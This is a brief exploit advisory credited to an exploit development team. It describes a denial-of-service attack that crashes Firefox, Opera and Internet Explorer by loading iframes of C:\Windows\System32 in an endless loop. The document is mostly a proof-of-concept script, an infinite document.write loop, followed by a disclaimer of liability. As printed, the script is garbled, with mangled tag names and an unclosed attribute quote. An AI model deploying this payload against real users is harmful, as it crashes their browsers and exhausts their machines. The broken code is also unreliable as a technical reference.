|
Description
========
Browser DoS through viewing
of a malicious page that repeatedly loads iframes of C:\Windows\System32 using
100% cpu
Crashes Mozilla Firefox, Latest
Opera and IE - Opera gives the error "The address type is unknown or
unsupported" and crashes
POC
===
<scr1pt language="_javascript_">
while(true)
{
document.write("<iframe src=""
}
</scr1pt>Discovered by MeFakon part of the su1d exploit development team DISCLAIMER: This advisory is meant only for the dissemination of information, alerting the general public about a security issue. Use this information at your own discretion. In brief, the author is not responsible for any use, misuse, abuse of this information. Also, this information is provided "as is" without any warranty of any kind. |
